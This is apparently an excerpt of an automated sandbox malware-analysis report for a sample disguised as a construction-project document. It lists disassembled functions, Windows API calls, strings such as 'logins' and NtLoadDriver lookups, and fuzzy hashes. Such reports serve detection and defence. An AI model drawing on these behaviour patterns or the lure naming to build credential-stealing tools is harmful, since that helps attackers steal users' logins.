                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                          • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                          • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                          Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                          • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                          • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                          Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                          Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                          • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                          • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                          Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                          • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                          • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                          Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1043902810-0
                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                          Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                          • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                          • wcscpy.MSVCRT ref: 004448B4
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                          • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                          • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                          Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                          • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                          • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                          • API String ID: 3330709923-517860148
                                                                                                                          • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                          • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                          Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                                                          • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                          • String ID: logins$null
                                                                                                                          • API String ID: 2148543256-2163367763
                                                                                                                          • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                          • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                          Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                          • String ID: ---
                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                          • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                          • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                          Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1010922700-0
                                                                                                                          • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                          • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                          Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                          • free.MSVCRT ref: 004186C7
                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                          • free.MSVCRT ref: 004186E0
                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
